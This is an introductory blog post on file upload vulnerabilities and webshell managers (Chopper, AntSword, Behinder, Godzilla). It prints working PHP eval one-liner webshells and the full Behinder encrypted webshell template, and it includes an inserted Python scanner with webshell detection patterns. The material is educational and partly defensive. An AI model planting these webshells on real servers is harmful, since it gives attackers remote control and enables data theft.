Arbitrary file upload vulnerability (introduction)

Preface

Times change and technology changes with them. In today's networked environment we deal with data constantly: chatting on WeChat or QQ, shopping on Taobao or JD.com, all of it is data exchange. Those exchanges are also full of malicious behaviour and threats, so protecting the data of individuals and institutions has made cybersecurity critical. Today we will look at the principle of the arbitrary file upload vulnerability and the harm it can cause.

What is file upload

File upload is the process of transferring a file from a local computer or other device to a network server or other storage location. It lets you move files (images, documents, audio, video and so on) to different locations on the network for sharing, backup, storage, or publishing content to others.

File upload typically involves the following steps:

  1. The user selects files to upload: through a file explorer, by dragging and dropping, or via a file-selection dialog.
  2. The files are transferred to the server: once selected, the file is sent over the network to a specific server, using a protocol such as HTTP, FTP or SFTP.
  3. The file is stored and processed: when the file arrives, the server stores it in its local file system or other storage and, depending on the application's needs, may process, convert, validate or otherwise operate on it.
  4. The server responds: it returns a success response telling the user the upload completed, or an error response indicating that something went wrong.

Put simply, file upload is copy-and-paste, except that the execution environment has moved from our local computer to a network of servers. If an attacker can use the upload function to place a piece of malicious code on a server that will then execute it, the consequences can be very serious.

The dangers of file upload vulnerabilities

Now that we know what file uploading is, let’s talk about what harm it can cause.

We just said that if hackers and other criminals use file upload to upload malicious code, the consequences are very serious. Why? Imagine a thief secretly obtains a key to your house without your knowledge and lets himself in. What will he do? Steal your money, trash the place, or worse, hide there and watch your life every day. It is unsettling to think about, and in the online world the question is the same: what will a hacker do with a file upload vulnerability? Let's take a look.

When hackers or criminals use file upload vulnerabilities to upload malicious code, they may cause the following serious harm:

  1. Server compromise: hackers upload files containing malicious code, such as a webshell, and use them to gain control of the server. Once in, they can read, modify or delete sensitive data, change system settings, and even pivot to other users or servers.

  2. Data leakage: through an uploaded malicious file, hackers can access and steal sensitive data held on the server, such as users' personal information, login credentials and payment data. That data can then be used for identity theft, fraud or other malicious activity.

  3. System damage: uploaded malicious code may crash the system, stop services or corrupt system files, leading to business disruption, data loss, and serious damage to an organization's operations and reputation.

  4. Malware propagation: hackers may upload files carrying malware or viruses. When other users download or open them, their devices become infected and the malware spreads to other nodes on the network, widening the infection and the damage.

  5. User privacy leakage: hackers who can upload to, and read from, the server can reach users' personal files or photos, exposing private data. That harms an individual's reputation and privacy and can enable further attacks such as social engineering.

In short, when a file upload vulnerability is exploited it can lead to system intrusion, sensitive-data leakage, service interruption, malware spread and privacy loss. Identifying and remediating file upload vulnerabilities early, and putting appropriate safeguards in place, is therefore critical to protecting networks and systems.

webshell

Among file upload vulnerabilities, the thing that matters most is the webshell; it is the core of the attack, and uploading one is what hackers work so hard for. So what is a webshell? Break the word down: "web" and "shell". In the previous Linux article I introduced the shell in detail: the shell is a program through which the user interacts with the kernel. Joining the two, a webshell is a script placed on a web server through which a remote user interacts with that server: it receives commands over HTTP and runs them with the privileges of the web server process. In other words, with a webshell we can execute whatever commands we want on that server, limited only by the web server's own permissions.

<?php @eval($_POST['pass']);

This is the simplest webshell. We call it a one-sentence Trojan because a single line of code is enough to take over your web server. It reads the POST parameter named pass and hands its value to eval(), so whatever PHP code we put in pass is executed on the attacked server, and we can run any commands we want there. Of course there are many more complex webshells with far more powerful functions.
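The one-liner's strength is also its weakness: the string eval($_POST[...]) sits in clear text on disk. The following Python script is added here as an example and is not part of the original post. It is a small heuristic scanner for PHP files in an upload directory: it flags the one-sentence Trojan above, the assert() variant attackers use to dodge a naive grep for eval, and the Behinder-style template shown later in this post, while leaving a normal upload handler alone. The four sample files are constructed for the example, and the rule set is an assumption about what is worth flagging, not an exhaustive signature list.

```python
"""Heuristic scanner for PHP one-sentence trojans and Behinder-style
templates in an upload directory. Added example, not part of the original
post; the four sample files below are constructed for it."""
import re

# Functions that turn a string into executed code or a shell command.
CODE_SINKS = (r"(?:eval|assert|create_function|call_user_func(?:_array)?"
              r"|system|passthru|shell_exec|exec|popen|proc_open)")
# Where attacker-controlled input arrives from.
INPUT_SOURCES = (r"(?:\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\b"
                 r"|php://input|getallheaders\s*\()")

RULES = [
    # sink( ... $_POST[...] ... ) inside one statement: the classic one-liner
    ("one-sentence trojan",
     re.compile(r"\b" + CODE_SINKS + r"\s*\(\s*[^;]*" + INPUT_SOURCES, re.I)),
    # raw request body read, then a sink anywhere later: Behinder/Godzilla style
    ("raw-body webshell",
     re.compile(r"php://input.*?\b" + CODE_SINKS + r"\s*\(", re.I | re.S)),
    # the exact combination used by the Behinder PHP template in this post
    ("behinder template",
     re.compile(r"openssl_decrypt\s*\(.*?AES128.*?__invoke.*?\beval\s*\(",
                re.I | re.S)),
]


def strip_comments(src: str) -> str:
    """Drop /* */, // and # comments so commented-out code is not flagged and
    a sink placed after a comment is still seen. The lookbehind keeps the
    '//' of php://input and of URLs intact."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"(?m)(?<!:)(?://|#).*$", "", src)


def scan_php(src: str) -> list:
    """Return the names of the rules that match, in RULES order."""
    cleaned = strip_comments(src)
    return [name for name, rx in RULES if rx.search(cleaned)]


# Constructed samples: the post's one-liner, an assert() variant hidden behind
# a comment, a Behinder-style template with the same structure as the one on
# the page, and a benign upload handler that must not be flagged.
SAMPLES = {
    "chopper": "<?php @eval($_POST['pass']);",
    "assert_variant": "<?php /* thumbnail helper */ @assert($_REQUEST['x']); ?>",
    "behinder": '''<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //first 16 hex chars of md5(password)
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl')) {
    $t="base64_"."decode";
    $post=$t($post."");
    for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; }
} else {
    $post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C { public function __invoke($p) { eval($p.""); } }
@call_user_func(new C(),$params);
?>''',
    "benign_upload": '''<?php
$allowed = ['image/png', 'image/jpeg'];
$tmp = $_FILES['f']['tmp_name'];
if (!in_array(mime_content_type($tmp), $allowed, true)) { exit('rejected'); }
$name = bin2hex(random_bytes(16)) . '.png';
move_uploaded_file($tmp, '/var/www/uploads/' . $name);
echo json_encode(['stored' => $name]);
''',
}


def scan_samples() -> dict:
    """Scan every constructed sample; maps sample name to matched rule names."""
    return {name: scan_php(src) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:15s} {hits or 'clean'}")
```

Run it over real files with scan_php(open(path).read()). The rules are deliberately loose (any sink fed from a request superglobal in the same statement), so treat a hit as a reason to look at the file, not as proof; obfuscated shells that build function names at runtime, like the "base64_"."decode" trick in the Behinder template, need a runtime or behavioural check as well.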

China Chopper

The author of Chopper is a veteran who grew up in a poor rural area. It is said that he did not finish junior high school and his English is not very good, but he taught himself C++, J2ME, PHP, JSP, ASP.NET and more, and knows more than a dozen programming languages. During a Taiwan-independence controversy six or seven years ago he defaced the websites of the Kuomintang and the Democratic Progressive Party with a page reading "There is only one China", and became famous overnight.

China Chopper (中国菜刀, "Chinese kitchen knife", after the household kitchen tool) is a well-known webshell management client. It is a powerful and widely used tool that hackers and attackers use to control target servers once a webshell is in place.

China Chopper has the following features:

  1. Simple and easy to use: it has an intuitive interface and straightforward controls, offering command execution, file management, system-information viewing and more.

  2. Concealment: the webshells it drives are tiny and can be disguised in various ways, and file permissions can be adjusted to make them less likely to be noticed during server review.

  3. Remote control: once a webshell is uploaded and reachable on the target, the attacker interacts with and controls the server through it: executing system commands, browsing and editing files, exporting databases, and so on.

image-20230822101924529

Using Chopper is also very simple. Once the webshell file is uploaded to the target server, we connect to it by its URL and obtain the corresponding permissions.

image-20230822102204442

This screenshot shows Chopper connected to a target with the corresponding permissions.

image-20230822102723379

Right-clicking opens more operations, such as database management and a virtual terminal.

image-20230822102855633

To add a connection, right-click in the blank area and enter the URL of the webshell on the compromised server.

image-20230822103306820

Here I use a simple PHP one-sentence Trojan to explain the fields.

<?php @eval($_POST['cmd']);?>

URL address: the address at which our webshell is reachable after upload. The specifics will be covered in detail in the later shooting-range (lab) posts.

Webshell password: the name of the POST parameter in the one-sentence Trojan (pass or cmd in the examples above). Chopper sends the code to execute in that parameter, so the value entered here must match the name used in the uploaded file.

Script type: the server-side language of the uploaded shell, which must match what the target actually executes. PHP is typical of Apache or Nginx hosts, ASP and ASPX of IIS, and JSP of Java web containers. In Chopper the script type is matched automatically.

Encoding: GB2312 is the Chinese national-standard encoding; this setting affects how text is displayed and entered.

AntSword

AntSword (蚁剑) is an open-source, cross-platform webshell management tool developed by a Chinese security team to help security researchers, penetration testers and system administrators manage and work with webshells more conveniently.

AntSword has the following characteristics:

  1. User-friendly: AntSword provides a graphical interface through which webshells are managed with intuitive operations, without cumbersome command-line work.

  2. Powerful functions: AntSword offers file management, command execution, database operations, system-information viewing and more, so a user can run commands remotely, upload and download files, access databases and perform many other operations.

  3. Cross-platform support: AntSword runs on Windows, Linux, macOS and other operating systems, so it can be used in different environments.

  4. Security: the project advertises safeguards and permission controls intended to keep the tool from being abused or used by unauthorized parties.

image-20230822105400603

Using AntSword is also very simple. It has much in common with Chopper, but is more powerful.

image-20230822110047571

Compared with the Chopper configuration, it is more concise.

image-20230822110325152

The interface after a successful connection is also more intuitive.

image-20230822110413811

AntSword is a very powerful webshell manager. Further instructions on using it will come in future updates.

Behinder

Behinder (冰蝎, "Ice Scorpion") is a newer webshell client written in Java that encrypts its communication traffic. The traffic of the long-established China Chopper has obvious characteristics (the PHP code to execute travels in clear text in the POST body) and is easily caught by security devices, so it is used less and less in real engagements, and encrypted webshells are becoming the norm.

Because the communication is encrypted, traditional WAF and IDS devices that rely on payload signatures cannot see the commands, which makes threat hunting much harder. Behinder's defining feature is that it symmetrically encrypts the interactive traffic. Earlier versions negotiated a random key per session; in the template shown below the key is fixed, the first 16 hex characters of the MD5 of the connection password. Either way the payload content is opaque to signature matching, so detection has to rely on other indicators, such as the shell file on disk and traffic behaviour, rather than on the request body.

image-20230822134653137

Behinder ships with its own dedicated webshell files. The PHP one looks like this:

<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; // first 16 characters of the 32-character MD5 of the connection password; default password: rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");          // raw request body
if(!extension_loaded('openssl'))
{
    // fallback when OpenSSL is unavailable: base64, then XOR with the key
    $t="base64_"."decode";                        // concatenation hides the function name from a simple grep
    $post=$t($post."");
    for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15];     // ($i+1)&15: + binds tighter than & in PHP
    }
}
else
{
    $post=openssl_decrypt($post, "AES128", $key); // AES-128-CBC, base64 input, zero IV
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{
    public function __invoke($p) {
        eval($p."");                              // the decrypted payload is executed here
    }
}
@call_user_func(new C(),$params);
?>

image-20230822135056502

Connect with the webshell that ships with Behinder and you have full control of the site.

image-20230822135146372

Once inside, you can see that Behinder's functions are very powerful.

Behinder features:

  • Beyond the shell itself, Behinder provides a rich set of functions and tools, such as port forwarding, proxy services and lateral movement.
  • Behinder provides an intuitive graphical interface and user-friendly operation, making it easier to use and control.
  • Encryption principle: when the PHP OpenSSL extension is loaded, Behinder uses AES with a 16-byte (128-bit) key, that is AES-128. AES is fast to encrypt and decrypt in both software and hardware (Intel's AES-NI instruction set consists of six instructions), has low memory requirements, and is well suited to traffic encryption.

Three major characteristics: the traffic is encrypted and hard to detect; the webshell evades antivirus well; the encryption method is AES.

Godzilla

Godzilla (哥斯拉) is a webshell tool named after the giant monster of the Japanese Godzilla films. It lets an attacker perform all kinds of operations on the target server: executing commands, viewing and modifying files, manipulating databases, and so on.

Godzilla requires a Java 1.8 runtime. When the program is opened it creates a data.db database to store its data. It can generate webshell files automatically and supports JSP, PHP, ASP and ASPX payloads. Compared with Behinder, Godzilla is more demanding to operate; to use it well you need to learn some of its specific commands.

image-20230822140202219

Godzilla's initial interface.

image-20230822140237657

Use Management->Generate to generate a webshell.

image-20230822140533496

Configuring the connection is less convenient than in the other webshell tools: you have to fill in the relevant configuration yourself, otherwise the connection easily fails.

image-20230822140635150

After the connection is successful, basic information will be returned.

image-20230822140729910

Here we can also configure various related plug-ins.

Summary

  • The file upload vulnerability is a common web security vulnerability that lets an attacker place malicious files on the target server in order to execute arbitrary code or gain system privileges.

  • A webshell is the file an attacker uploads to remotely control the compromised server; common webshell management tools include China Chopper, AntSword, Behinder and Godzilla.

Now we know what file upload is, what harm it can do, what a webshell is, and some common webshell tools. This is just an appetizer for file upload vulnerabilities. In future posts I will gradually cover the use of these tools, the methods of exploiting file upload vulnerabilities, and how to prevent them.

Origin blog.csdn.net/weixin_44369049/article/details/132437209